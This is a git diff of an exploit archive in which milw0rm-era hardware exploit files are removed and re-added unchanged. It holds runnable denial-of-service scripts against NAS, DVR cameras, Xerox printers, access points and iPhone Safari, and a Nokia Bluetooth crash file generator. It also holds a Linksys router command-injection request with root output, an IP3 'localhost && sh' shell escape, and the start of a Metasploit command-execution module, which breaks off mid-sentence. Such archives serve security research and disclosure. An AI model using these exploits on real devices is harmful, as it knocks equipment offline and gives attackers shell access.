"http://$IP/bts.cgi?redirect=bt.htm&failure=fail.htm&type=bt_search_apply&torrent_path=&download_path=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" +;; +'2') +wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/bts.cgi?redirect=bt.htm&failure=fail.htm&type=bt_search_apply&torrent_path=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&download_path=PUBLIC" +;; +esac + +echo "Stack Smashed..." + +# milw0rm.com [2009-04-20] diff --git a/platforms/hardware/dos/856.c b/platforms/hardware/dos/856.c index 38478132d..8b3b48ef4 100755 --- a/platforms/hardware/dos/856.c +++ b/platforms/hardware/dos/856.c @@ -1,65 +1,65 @@ -/* - Nokia Bluetab Exploit - Found & coded by Qnix - - - This Exploit will creat file called bluetab.txt with your - bluetooth nickname, send the file to your nokia mobile - open it copy the nickname and paste it to your bluetooth - nickname, if any one search and find your nickname his - mobile will restart . - - this exploit work on many other symbian and java mobiles . - - Qnix - Qnix@bsdmail.org - -*/ - -#include -#define tab1 0x09 -#define tab2 0x2E -#define dot1 0x0A - -int main(int argc,char *argv[]) -{ - - FILE *bluetab; - - if(argc < 2) - { - msgm(); - printf("Useage : ./bluetab \n"); - return 0; - } - else - { - msgm(); - printf("bluetab.txt file created with your nickname . \n"); - } - - bluetab = fopen("bluetab.txt","w"); - if(!bluetab) - { - msgm(); - printf("Some kind of file error!\n"); - return 0; - } - - - fprintf(bluetab,"%s%c%c%c",argv[1],tab1,tab2,dot1); - fclose(bluetab); - return 0; - -} - -msgm() -{ - - printf(" ------------------------------- \n"); - printf(" Nokia Bluetab Exploit \n"); - printf(" found & coded by \n"); - printf(" Qnix@bsdmail.org \n"); - printf(" ------------------------------- \n\n"); -} - -/* v1 2005-03-04 milw0rm.com */ - -// milw0rm.com [2005-09-23] +/* + Nokia Bluetab Exploit + Found & coded by Qnix + + - This Exploit will creat file called bluetab.txt with your + bluetooth nickname, send the file to your nokia mobile + open it copy the nickname and paste it to your bluetooth + nickname, if any one search and find your nickname his + mobile will restart . + - this exploit work on many other symbian and java mobiles . + + Qnix - Qnix@bsdmail.org + +*/ + +#include +#define tab1 0x09 +#define tab2 0x2E +#define dot1 0x0A + +int main(int argc,char *argv[]) +{ + + FILE *bluetab; + + if(argc < 2) + { + msgm(); + printf("Useage : ./bluetab \n"); + return 0; + } + else + { + msgm(); + printf("bluetab.txt file created with your nickname . \n"); + } + + bluetab = fopen("bluetab.txt","w"); + if(!bluetab) + { + msgm(); + printf("Some kind of file error!\n"); + return 0; + } + + + fprintf(bluetab,"%s%c%c%c",argv[1],tab1,tab2,dot1); + fclose(bluetab); + return 0; + +} + +msgm() +{ + + printf(" ------------------------------- \n"); + printf(" Nokia Bluetab Exploit \n"); + printf(" found & coded by \n"); + printf(" Qnix@bsdmail.org \n"); + printf(" ------------------------------- \n\n"); +} + +/* v1 2005-03-04 milw0rm.com */ + +// milw0rm.com [2005-09-23] diff --git a/platforms/hardware/dos/8584.py b/platforms/hardware/dos/8584.py index bcee17fdd..36d58aea4 100755 --- a/platforms/hardware/dos/8584.py +++ b/platforms/hardware/dos/8584.py @@ -1,74 +1,74 @@ -#!/usr/bin/python -###################################################### -# Addonics NAS Adapter FTP server DoS -# Tested against NASU2FW41 Loader 1.17 -# Coded by Mike Cyr, aka h00die -# mcyr2 at csc dot_____________com -# Notes: Since the HTTP server was so vulnerable, is -# this really a suprise? -# Greetz to muts and loganWHD, I tried harder -# http://www.offensive-security.com/offsec101.php turning script kiddies into ninjas daily -# Log: Vendor notification March 25, 2009 -# Vendor response March 26, 2009 -# Milw0rm release May 1, 2009 -###################################################### - -import socket -import sys - -buffer= 'a' -counter=1 - -ip = raw_input("IP: ") -un = raw_input("Username: ") -password = raw_input("Password: ") - -print "Vulnerable commands" -print "1. rmdir" -print "2. delete" -print "3. rename" -command = raw_input("Command to crash (#): ") - -if command == "1": - print "fuzzing " + ip + " with command rmdir" -elif command == "2": - print "fuzzing " + ip + " with command delete" -elif command == "3": - print "fuzzing " + ip + " with command rename" -else: - print "your an idiot" - sys.exit(1) - -s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) -connect=s.connect(('192.168.2.101',21)) -print s.recv(1024) -s.send('USER ' + un + '\r\n') -print s.recv(1024) -s.send('PASS ' + password + '\r\n') -print s.recv(1024) -if command == "1": - while len(buffer) <=512: - buffer = buffer + 'a' - counter=counter+1 - s.send('XRMD ' + buffer + '\r\n') - print 'rmdir ' + buffer + '\r\n' -elif command == "2": - while len(buffer) <=523: - buffer = buffer + 'a' - counter=counter+1 - s.send('delete ' + buffer + '\r\n') -elif command == "3": - while len(buffer) <=526: - buffer = buffer + 'a' - counter=counter+1 - s.send('RNFR ' + buffer + '\r\n') - answer=s.recv(1024) - s.send('RNTO ' + buffer + '\r\n') - answer=s.recv(1024) -if (answer == "550 Requested action not taken.\r\n"): - print "Stack smashed" -else: - print "fail: " + answer -s.close() - -# milw0rm.com [2009-05-01] +#!/usr/bin/python +###################################################### +# Addonics NAS Adapter FTP server DoS +# Tested against NASU2FW41 Loader 1.17 +# Coded by Mike Cyr, aka h00die +# mcyr2 at csc dot_____________com +# Notes: Since the HTTP server was so vulnerable, is +# this really a suprise? +# Greetz to muts and loganWHD, I tried harder +# http://www.offensive-security.com/offsec101.php turning script kiddies into ninjas daily +# Log: Vendor notification March 25, 2009 +# Vendor response March 26, 2009 +# Milw0rm release May 1, 2009 +###################################################### + +import socket +import sys + +buffer= 'a' +counter=1 + +ip = raw_input("IP: ") +un = raw_input("Username: ") +password = raw_input("Password: ") + +print "Vulnerable commands" +print "1. rmdir" +print "2. delete" +print "3. rename" +command = raw_input("Command to crash (#): ") + +if command == "1": + print "fuzzing " + ip + " with command rmdir" +elif command == "2": + print "fuzzing " + ip + " with command delete" +elif command == "3": + print "fuzzing " + ip + " with command rename" +else: + print "your an idiot" + sys.exit(1) + +s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) +connect=s.connect(('192.168.2.101',21)) +print s.recv(1024) +s.send('USER ' + un + '\r\n') +print s.recv(1024) +s.send('PASS ' + password + '\r\n') +print s.recv(1024) +if command == "1": + while len(buffer) <=512: + buffer = buffer + 'a' + counter=counter+1 + s.send('XRMD ' + buffer + '\r\n') + print 'rmdir ' + buffer + '\r\n' +elif command == "2": + while len(buffer) <=523: + buffer = buffer + 'a' + counter=counter+1 + s.send('delete ' + buffer + '\r\n') +elif command == "3": + while len(buffer) <=526: + buffer = buffer + 'a' + counter=counter+1 + s.send('RNFR ' + buffer + '\r\n') + answer=s.recv(1024) + s.send('RNTO ' + buffer + '\r\n') + answer=s.recv(1024) +if (answer == "550 Requested action not taken.\r\n"): + print "Stack smashed" +else: + print "fail: " + answer +s.close() + +# milw0rm.com [2009-05-01] diff --git a/platforms/hardware/dos/8964.txt b/platforms/hardware/dos/8964.txt index 1e67cfecf..d9841e93f 100755 --- a/platforms/hardware/dos/8964.txt +++ b/platforms/hardware/dos/8964.txt @@ -1,44 +1,44 @@ -Product Name: Netgear DG632 Router -Vendor: http://www.netgear.com -Date: 15 June, 2009 -Author: tom@tomneaves.co.uk < tom@tomneaves.co.uk > -Original URL: http://www.tomneaves.co.uk/Netgear_DG632_Remote_DoS.txt -Discovered: 18 November, 2006 -Disclosed: 15 June, 2009 - -I. DESCRIPTION - -The Netgear DG632 router has a web interface which runs on port 80. This -allows an admin to login and administer the device's settings. However, -a Denial of Service (DoS) vulnerability exists that causes the web interface -to crash and stop responding to further requests. - -II. DETAILS - -Within the "/cgi-bin/" directory of the administrative web interface exists a -file called "firmwarecfg". This file is used for firmware upgrades. A HTTP POST -request for this file causes the web server to hang. The web server will stop -responding to requests and the administrative interface will become inaccessible -until the router is physically restarted. - -While the router will still continue to function at the network level, i.e. it will -still respond to ICMP echo requests and issue leases via DHCP, an administrator will -no longer be able to interact with the administrative web interface. - -This attack can be carried out internally within the network, or over the Internet -if the administrator has enabled the "Remote Management" feature on the router. - -Affected Versions: Firmware V3.4.0_ap (others unknown) - -III. VENDOR RESPONSE - -12 June, 2009 - Contacted vendor. -15 June, 2009 - Vendor responded. Stated the DG632 is an end of life product and is no -longer supported in a production and development sense, as such, there will be no further -firmware releases to resolve this issue. - -IV. CREDIT - -Discovered by Tom Neaves - -# milw0rm.com [2009-06-15] +Product Name: Netgear DG632 Router +Vendor: http://www.netgear.com +Date: 15 June, 2009 +Author: tom@tomneaves.co.uk < tom@tomneaves.co.uk > +Original URL: http://www.tomneaves.co.uk/Netgear_DG632_Remote_DoS.txt +Discovered: 18 November, 2006 +Disclosed: 15 June, 2009 + +I. DESCRIPTION + +The Netgear DG632 router has a web interface which runs on port 80. This +allows an admin to login and administer the device's settings. However, +a Denial of Service (DoS) vulnerability exists that causes the web interface +to crash and stop responding to further requests. + +II. DETAILS + +Within the "/cgi-bin/" directory of the administrative web interface exists a +file called "firmwarecfg". This file is used for firmware upgrades. A HTTP POST +request for this file causes the web server to hang. The web server will stop +responding to requests and the administrative interface will become inaccessible +until the router is physically restarted. + +While the router will still continue to function at the network level, i.e. it will +still respond to ICMP echo requests and issue leases via DHCP, an administrator will +no longer be able to interact with the administrative web interface. + +This attack can be carried out internally within the network, or over the Internet +if the administrator has enabled the "Remote Management" feature on the router. + +Affected Versions: Firmware V3.4.0_ap (others unknown) + +III. VENDOR RESPONSE + +12 June, 2009 - Contacted vendor. +15 June, 2009 - Vendor responded. Stated the DG632 is an end of life product and is no +longer supported in a production and development sense, as such, there will be no further +firmware releases to resolve this issue. + +IV. CREDIT + +Discovered by Tom Neaves + +# milw0rm.com [2009-06-15] diff --git a/platforms/hardware/dos/9067.py b/platforms/hardware/dos/9067.py index 566e4a3bf..c660a1def 100755 --- a/platforms/hardware/dos/9067.py +++ b/platforms/hardware/dos/9067.py @@ -1,20 +1,20 @@ -import socket -import sys -print "----------------------------------------------------------------" -print " ARD-9808 DVR Card Security Camera <= Remote Denial Of Service " -print " author: Stack " -print "----------------------------------------------------------------" -host = "127.0.0.1" -port = 80 -try: - buff = "//.\\" * 1000 - request = "GET " + buff + " HTTP/1.0" - connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - connection.connect((host, port)) - connection.send(request) - raw_input('\n\nExploit completed. Press "Enter" to quit...') - sys.exit -except: - raw_input('\n\nUnable to connect. Press "Enter" to quit...') - -# milw0rm.com [2009-07-01] +import socket +import sys +print "----------------------------------------------------------------" +print " ARD-9808 DVR Card Security Camera <= Remote Denial Of Service " +print " author: Stack " +print "----------------------------------------------------------------" +host = "127.0.0.1" +port = 80 +try: + buff = "//.\\" * 1000 + request = "GET " + buff + " HTTP/1.0" + connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + connection.connect((host, port)) + connection.send(request) + raw_input('\n\nExploit completed. Press "Enter" to quit...') + sys.exit +except: + raw_input('\n\nUnable to connect. Press "Enter" to quit...') + +# milw0rm.com [2009-07-01] diff --git a/platforms/hardware/dos/9514.py b/platforms/hardware/dos/9514.py index 49c31a11e..665c56569 100755 --- a/platforms/hardware/dos/9514.py +++ b/platforms/hardware/dos/9514.py @@ -1,183 +1,183 @@ -# Louhi Networks Information Security Research -# Security Advisory -# -# -# Advisory: Xerox WorkCentre multiple models Denial of Service -# Release Date: 2009/08/25 -# Last Modified: 2009/08/25 -# Authors: Juho Ranta -# [juho.ranta@louhi.fi] -# Henri Lindberg, CISA -# [henri.lindberg@louhi.fi] -# -# Application: Xerox WorkCentre -# Verified: Controller+PS ROM Version 1.202.1 and 1.202.5 -# Devices: Xerox WorkCentre 7132, -# WC7232/7242, WC7328/7335/7345/7346 and -# WC7425/28/35 -# Attack type: Denial of Service -# Risk: Low -# Vendor Status: Patch available for WC7232/7242 -# References: http://www.louhinetworks.fi/advisory/xerox_0908.txt -# -# http://www.cert.fi/haavoittuvuudet/2009/haavoittuvuus-2009-081.html -# -# http://www.support.xerox.com/go/results.asp?Xtype=download&prodID=WC7232_WC7242&Xlang=en_US&Xcntry=USA -# -# -# Overview -# -# Quote from http://www.xerox.com/ -# "The Xerox WorkCentre 7132 multifunction is the affordable transition -# to the next level of productivity for your office. One easy-to-use -# device offers powerful printing, copying, scanning, and faxing. The -# WorkCentre 7132 also gives you color when you need it, for critical -# documents and for added impact. Robust functions, straightforward -# operation, and color within your budget . that should keep everyone -# smiling and productive." -# -# During a brief assessment performed for Xerox WorkCentre 7132 it was -# discovered that LPD daemon implementation contains a weakness -# related to robustness of LPD protocol handling. Attacker can crash -# the whole device with a relatively simple attack. Recovering from -# the denial-of-service condition requires power cycling the device. -# -# Details -# -# Device freezes when it is flooded with LPD requests having oversized -# queue name length AND other features of the device are accessed -# during the attack. -# -# The LPD daemon terminates the connection when it receives a request -# with an oversized queue name. The required minimum length for this -# seems to vary. Our proof-of-concept attack sends ASCII character -# blocks to the LPD daemon until connection is closed, while sending -# HTTP requests to the web administration interface. -# -# By flooding the device with these invalid LPD requests and accessing -# other features at the same time, the device can be crashed. This was -# verified with two different firmware versions (1.202.1 and 1.202.5). -# -# It must be noted that successful denial-of-service attack requires -# the steps described above. Sending requests with oversized queue -# names does crash the device by itself. -# -# Due to the black box nature of the performed attack against a -# production device, we were not able to determine the exact root -# cause for the crash. According to vendor this is caused by a memory -# leak, but further exploitability or memory corruption has neither -# been confirmed nor denied. -# -# Vulnerability was detected with an LPD protocol implementation -# written for Sulley Fuzzing Framework. -# -# -# Preconditions -# -# *LPD daemon is enabled. -# *Attacker has network access to the LPD daemon -# *Attacker has network access to other features OR -# *Valid user uses the device on location -# -# -# Symptoms of successful attack -# -# One or more of the following: -# *Control panel lights are blinking, no response to pushing buttons -# *LCD panel displays error message -# *LCD panel displays a halted progress bar -# *Switching power off from on/off button takes more than 10 seconds -# -# Proof of Concept: -# -# Python code available at: -# http://www.louhinetworks.fi/advisory/xerox/exploit.py -# http://www.louhinetworks.fi/advisory/xerox/webInterface.py -# -# Pictures of a crashed control panel (Finnish language): -# http://www.louhinetworks.fi/advisory/xerox/error1.jpg -# http://www.louhinetworks.fi/advisory/xerox/freeze1.jpg -# -# Web interface requests are performed with a separate Python -# process/script in order to achieve more reliable exploitation under -# Windows. -# -# Mitigation: -# -# Preventive -# *Install patch from vendor -# *Configure IPS signature for LPD requests with oversized queue -# names -# *Allow only trusted users to access LPD daemon -# *Disable LPD daemon -# -# Detective -# *Configure IDS signature for LPD requests with oversized queue -# names -# -# Disclosure Timeline (selected dates): -# -# X 2008 - Vulnerability discovered -# 3. September 2008 - Contacted CERT-FI by email describing the -# issue with Xerox WC 7132 -# 20. November 2008 - CERT-FI confirms vendor has been notified -# 21. January 2009 - Vendor is unable to reproduce the issue, -# but continues trying -# 22. January 2009 - Vulnerability reproduced, vendor investigates -# other devices. Apologizes slow response. -# 17. June 2009 - Vendor has identified vulnerable devices, -# patch due in July. -# 20. August 2009 - Patch available for download (only -# WC7232/7242) -# 25. August 2009 - Advisory released -# -# A Big Thank You to CERT-FI's Vulnerability Coordination for persistent -# coordination effort. -# -# Copyright 2009 Louhi Networks Oy. All rights reserved. No warranties, -# no liabilities, information provided 'as is' for educational purposes. -# Reproduction allowed as long as credit is given. Information wants to -# be free. - -import socket -import sys -import os -import httplib -import signal - -if len(sys.argv) < 2: - print("Usage: python exploit.py printerIpAddress") - print("After the script is started, execute the webInterface.py script") - sys.exit(0) - -ipAddress = sys.argv[1] - - -i = 0 - -while True: - i += 1 - try: - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.connect((ipAddress, 515)) - - except: - # If the connection fails, printer has crashed - print("Unable to connect") - sys.exit(0) - - # Send receive a printer job -command. Queue name will be as long as - # possible. The printer will disconnect when the queue name has reached it's - # maximum length - s.send("\x02") - j = 0 - while True: - j += 1 - s.send("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA") - print(str(i) + "." + str(j)) - - s.close() - - print(i) - -# milw0rm.com [2009-08-25] +# Louhi Networks Information Security Research +# Security Advisory +# +# +# Advisory: Xerox WorkCentre multiple models Denial of Service +# Release Date: 2009/08/25 +# Last Modified: 2009/08/25 +# Authors: Juho Ranta +# [juho.ranta@louhi.fi] +# Henri Lindberg, CISA +# [henri.lindberg@louhi.fi] +# +# Application: Xerox WorkCentre +# Verified: Controller+PS ROM Version 1.202.1 and 1.202.5 +# Devices: Xerox WorkCentre 7132, +# WC7232/7242, WC7328/7335/7345/7346 and +# WC7425/28/35 +# Attack type: Denial of Service +# Risk: Low +# Vendor Status: Patch available for WC7232/7242 +# References: http://www.louhinetworks.fi/advisory/xerox_0908.txt +# +# http://www.cert.fi/haavoittuvuudet/2009/haavoittuvuus-2009-081.html +# +# http://www.support.xerox.com/go/results.asp?Xtype=download&prodID=WC7232_WC7242&Xlang=en_US&Xcntry=USA +# +# +# Overview +# +# Quote from http://www.xerox.com/ +# "The Xerox WorkCentre 7132 multifunction is the affordable transition +# to the next level of productivity for your office. One easy-to-use +# device offers powerful printing, copying, scanning, and faxing. The +# WorkCentre 7132 also gives you color when you need it, for critical +# documents and for added impact. Robust functions, straightforward +# operation, and color within your budget . that should keep everyone +# smiling and productive." +# +# During a brief assessment performed for Xerox WorkCentre 7132 it was +# discovered that LPD daemon implementation contains a weakness +# related to robustness of LPD protocol handling. Attacker can crash +# the whole device with a relatively simple attack. Recovering from +# the denial-of-service condition requires power cycling the device. +# +# Details +# +# Device freezes when it is flooded with LPD requests having oversized +# queue name length AND other features of the device are accessed +# during the attack. +# +# The LPD daemon terminates the connection when it receives a request +# with an oversized queue name. The required minimum length for this +# seems to vary. Our proof-of-concept attack sends ASCII character +# blocks to the LPD daemon until connection is closed, while sending +# HTTP requests to the web administration interface. +# +# By flooding the device with these invalid LPD requests and accessing +# other features at the same time, the device can be crashed. This was +# verified with two different firmware versions (1.202.1 and 1.202.5). +# +# It must be noted that successful denial-of-service attack requires +# the steps described above. Sending requests with oversized queue +# names does crash the device by itself. +# +# Due to the black box nature of the performed attack against a +# production device, we were not able to determine the exact root +# cause for the crash. According to vendor this is caused by a memory +# leak, but further exploitability or memory corruption has neither +# been confirmed nor denied. +# +# Vulnerability was detected with an LPD protocol implementation +# written for Sulley Fuzzing Framework. +# +# +# Preconditions +# +# *LPD daemon is enabled. +# *Attacker has network access to the LPD daemon +# *Attacker has network access to other features OR +# *Valid user uses the device on location +# +# +# Symptoms of successful attack +# +# One or more of the following: +# *Control panel lights are blinking, no response to pushing buttons +# *LCD panel displays error message +# *LCD panel displays a halted progress bar +# *Switching power off from on/off button takes more than 10 seconds +# +# Proof of Concept: +# +# Python code available at: +# http://www.louhinetworks.fi/advisory/xerox/exploit.py +# http://www.louhinetworks.fi/advisory/xerox/webInterface.py +# +# Pictures of a crashed control panel (Finnish language): +# http://www.louhinetworks.fi/advisory/xerox/error1.jpg +# http://www.louhinetworks.fi/advisory/xerox/freeze1.jpg +# +# Web interface requests are performed with a separate Python +# process/script in order to achieve more reliable exploitation under +# Windows. +# +# Mitigation: +# +# Preventive +# *Install patch from vendor +# *Configure IPS signature for LPD requests with oversized queue +# names +# *Allow only trusted users to access LPD daemon +# *Disable LPD daemon +# +# Detective +# *Configure IDS signature for LPD requests with oversized queue +# names +# +# Disclosure Timeline (selected dates): +# +# X 2008 - Vulnerability discovered +# 3. September 2008 - Contacted CERT-FI by email describing the +# issue with Xerox WC 7132 +# 20. November 2008 - CERT-FI confirms vendor has been notified +# 21. January 2009 - Vendor is unable to reproduce the issue, +# but continues trying +# 22. January 2009 - Vulnerability reproduced, vendor investigates +# other devices. Apologizes slow response. +# 17. June 2009 - Vendor has identified vulnerable devices, +# patch due in July. +# 20. August 2009 - Patch available for download (only +# WC7232/7242) +# 25. August 2009 - Advisory released +# +# A Big Thank You to CERT-FI's Vulnerability Coordination for persistent +# coordination effort. +# +# Copyright 2009 Louhi Networks Oy. All rights reserved. No warranties, +# no liabilities, information provided 'as is' for educational purposes. +# Reproduction allowed as long as credit is given. Information wants to +# be free. + +import socket +import sys +import os +import httplib +import signal + +if len(sys.argv) < 2: + print("Usage: python exploit.py printerIpAddress") + print("After the script is started, execute the webInterface.py script") + sys.exit(0) + +ipAddress = sys.argv[1] + + +i = 0 + +while True: + i += 1 + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((ipAddress, 515)) + + except: + # If the connection fails, printer has crashed + print("Unable to connect") + sys.exit(0) + + # Send receive a printer job -command. Queue name will be as long as + # possible. The printer will disconnect when the queue name has reached it's + # maximum length + s.send("\x02") + j = 0 + while True: + j += 1 + s.send("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA") + print(str(i) + "." + str(j)) + + s.close() + + print(i) + +# milw0rm.com [2009-08-25] diff --git a/platforms/hardware/dos/9646.php b/platforms/hardware/dos/9646.php index 4940c58c4..19c0f9047 100755 --- a/platforms/hardware/dos/9646.php +++ b/platforms/hardware/dos/9646.php @@ -1,22 +1,22 @@ -Attacking port 1723(flood), it restarts the device almost instantly, here's the code in PHP. -It takes a few bytes for the AP to automatically restart - -\n"; -} else { - $trash = str_repeat("\x90","261"); - fwrite($con, $trash); - while (!feof($con)) { - echo "$trash \r\n"; - } - fclose($con); -} -?> - -# milw0rm.com [2009-09-11] +Attacking port 1723(flood), it restarts the device almost instantly, here's the code in PHP. +It takes a few bytes for the AP to automatically restart + +\n"; +} else { + $trash = str_repeat("\x90","261"); + fwrite($con, $trash); + while (!feof($con)) { + echo "$trash \r\n"; + } + fclose($con); +} +?> + +# milw0rm.com [2009-09-11] diff --git a/platforms/hardware/dos/9666.php b/platforms/hardware/dos/9666.php index d92f0763c..6f5620e9d 100755 --- a/platforms/hardware/dos/9666.php +++ b/platforms/hardware/dos/9666.php @@ -1,19 +1,19 @@ -# Apple Safari Iphone Crash using tel: -# Found by cloud : cloud[at]madpowah[dot]org -# http://blog.madpowah.org - -# Tested on Iphone 3G, OS 3.0.1 -# Launch Safari, enter the page and after a few seconds Safari will crash and black screen will appear - -# Exploit: - -'; -?> - -# milw0rm.com [2009-09-14] +# Apple Safari Iphone Crash using tel: +# Found by cloud : cloud[at]madpowah[dot]org +# http://blog.madpowah.org + +# Tested on Iphone 3G, OS 3.0.1 +# Launch Safari, enter the page and after a few seconds Safari will crash and black screen will appear + +# Exploit: + +'; +?> + +# milw0rm.com [2009-09-14] diff --git a/platforms/hardware/local/8833.txt b/platforms/hardware/local/8833.txt index e1fdbc76c..56fb44286 100755 --- a/platforms/hardware/local/8833.txt +++ b/platforms/hardware/local/8833.txt @@ -1,31 +1,31 @@ -1. Linksys WAG54G2 router is a popular SOHO class device. It provides ADSL / WiFi / Ethernet interfaces. - -2. When logged into web management console, it is possible to execute commands as root (tested on firmware: V1.00.10). - -3. PoC: - -GET /setup.cgi?ping_ipaddr1=1&ping_ipaddr2=1&ping_ipaddr3=1&ping_ipaddr4=1&ping_size=60&ping_number=1&ping_interval=1000&ping_timeout=5000&start=Start+Test&todo=ping_test&this_file=Diagnostics.htm&next_file=Diagnostics.htm&c4_ping_ipaddr=1.1.1.1;/bin/ps aux&message= HTTP/1.1 -Host: 192.168.1.1 -Authorization: Basic YWRtaW46YWRtaW4= - -HTTP/1.0 200 OK -sh: cannot create 1: Unknown error 30 -killall: pingmultilang: no process killed -killall: 2: no process killed - PID Uid VmSize Stat Command - 1 root 284 S init - 2 root SWN [ksoftirqd/0] - 3 root SW< [events/0] - 4 root SW< [khelper] - 5 root SW< [kthread] -... - -4. Note that it is needed to supply valid user/password (Authorization HTTP header). - -5. One could try to exploit this issue remotely (using CRSF) assuming that a victim did not change default password to the web management. - -6. The vendor (Cisco) was contacted in march '09 and confirmed the issue (but still it remains unpatched). - -7. More detailed information: http://www.securitum.pl/dh/Linksys_WAG54G2_-_escape_to_OS_root - -# milw0rm.com [2009-06-01] +1. Linksys WAG54G2 router is a popular SOHO class device. It provides ADSL / WiFi / Ethernet interfaces. + +2. When logged into web management console, it is possible to execute commands as root (tested on firmware: V1.00.10). + +3. PoC: + +GET /setup.cgi?ping_ipaddr1=1&ping_ipaddr2=1&ping_ipaddr3=1&ping_ipaddr4=1&ping_size=60&ping_number=1&ping_interval=1000&ping_timeout=5000&start=Start+Test&todo=ping_test&this_file=Diagnostics.htm&next_file=Diagnostics.htm&c4_ping_ipaddr=1.1.1.1;/bin/ps aux&message= HTTP/1.1 +Host: 192.168.1.1 +Authorization: Basic YWRtaW46YWRtaW4= + +HTTP/1.0 200 OK +sh: cannot create 1: Unknown error 30 +killall: pingmultilang: no process killed +killall: 2: no process killed + PID Uid VmSize Stat Command + 1 root 284 S init + 2 root SWN [ksoftirqd/0] + 3 root SW< [events/0] + 4 root SW< [khelper] + 5 root SW< [kthread] +... + +4. Note that it is needed to supply valid user/password (Authorization HTTP header). + +5. One could try to exploit this issue remotely (using CRSF) assuming that a victim did not change default password to the web management. + +6. The vendor (Cisco) was contacted in march '09 and confirmed the issue (but still it remains unpatched). + +7. More detailed information: http://www.securitum.pl/dh/Linksys_WAG54G2_-_escape_to_OS_root + +# milw0rm.com [2009-06-01] diff --git a/platforms/hardware/local/9688.txt b/platforms/hardware/local/9688.txt index 0e0cd7846..1a258070e 100755 --- a/platforms/hardware/local/9688.txt +++ b/platforms/hardware/local/9688.txt @@ -1,31 +1,31 @@ -############################################################### -#NetAccess IP3 - Force into shell -#By: r00t -#Shouts: G., Tee, ES, s1ngl3, and D1g1t5 -# -############################################################### -#Requirements: Remote access to an IP3 -# Any level control panel username/password -# -############################################################### -#Vendor Information: -#Thanks to Sebastian Wolfgarten (sebastian at wolfgarten dot com) -#for including vendor information in his AFD vuln -# -#"IP3's NetAccess is a device created for high demand environments such as -#convention centers or hotels. It handles the Internet access and -#provides for instance firewalling, billing, rate-limiting as well as -#various authentication mechanisms. The device is administrated via SSH -#or a web-based GUI." -# -############################################################### - -1. SSH into the IP3's IP address -2. After logging in, select the "ping" option (usually menu item 5) -3. Ping the address: localhost && sh -4. After four pings to localhost, shell will be forced open - -One may think there are limitations once logged into shell without -root access on an IP3. Wrong. - -# milw0rm.com [2009-09-15] +############################################################### +#NetAccess IP3 - Force into shell +#By: r00t +#Shouts: G., Tee, ES, s1ngl3, and D1g1t5 +# +############################################################### +#Requirements: Remote access to an IP3 +# Any level control panel username/password +# +############################################################### +#Vendor Information: +#Thanks to Sebastian Wolfgarten (sebastian at wolfgarten dot com) +#for including vendor information in his AFD vuln +# +#"IP3's NetAccess is a device created for high demand environments such as +#convention centers or hotels. It handles the Internet access and +#provides for instance firewalling, billing, rate-limiting as well as +#various authentication mechanisms. The device is administrated via SSH +#or a web-based GUI." +# +############################################################### + +1. SSH into the IP3's IP address +2. After logging in, select the "ping" option (usually menu item 5) +3. Ping the address: localhost && sh +4. After four pings to localhost, shell will be forced open + +One may think there are limitations once logged into shell without +root access on an IP3. Wrong. + +# milw0rm.com [2009-09-15] diff --git a/platforms/hardware/remote/1333.pm b/platforms/hardware/remote/1333.pm index ba45db92d..f64b4b025 100755 --- a/platforms/hardware/remote/1333.pm +++ b/platforms/hardware/remote/1333.pm @@ -1,256 +1,256 @@ -## -# This file is part of the Metasploit Framework and may be redistributed -# according to the licenses defined in the Authors field below. In the -# case of an unknown or missing license, this file defaults to the same -# license as the core Framework (dual GPLv2 and Artistic). The latest -# version of the Framework can always be obtained from metasploit.com. -## - -package Msf::Exploit::google_proxystylesheet_exec; - -use strict; -use base "Msf::Exploit"; -use Pex::Text; -use IO::Socket; -use IO::Select; -my $advanced = { }; - -my $info = -{ - 'Name' => 'Google Appliance ProxyStyleSheet Command Execution', - 'Version' => '$Revision: 1.1 $', - 'Authors' => [ 'H D Moore ' ], - - 'Description' => - Pex::Text::Freeform(qq{ - This module exploits a feature in the Saxon XSLT parser used by - the 